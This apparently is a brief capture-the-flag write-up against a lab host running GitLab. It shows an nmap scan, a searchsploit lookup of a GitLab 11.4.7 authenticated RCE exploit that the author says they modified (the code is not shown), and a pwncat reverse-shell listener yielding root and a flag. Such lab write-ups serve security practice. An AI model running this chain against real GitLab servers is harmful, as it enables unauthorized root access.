```
# Nmap 7.91 scan initiated Fri Feb 5 18:56:03 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.10.220
Nmap scan report for 10.10.10.220
Host is up (0.030s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
|_http-favicon: Unknown favicon MD5: F7E3D97F404E71D302B3239EEF48D5F2
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 5 18:56:34 2021 -- 1 IP address (1 host up) scanned in 30.44 seconds
```
All the exploits are dirty and broken so I picked the first and had to modify it:
```
$ searchsploit -p 49334.py
  Exploit: GitLab 11.4.7 - RCE (Authenticated)
      URL: https://www.exploit-db.com/exploits/49334
     Path: /usr/share/exploitdb/exploits/ruby/webapps/49334.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
```

```
$ pwncat -l 8888 -vv
INFO: Listening on :::8888 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.10.220:34958 (family 2/IPv4, TCP)
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@ready:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ready:/# cat /root/root.txt
b7f98681505cd39066f67147b103c2b3
```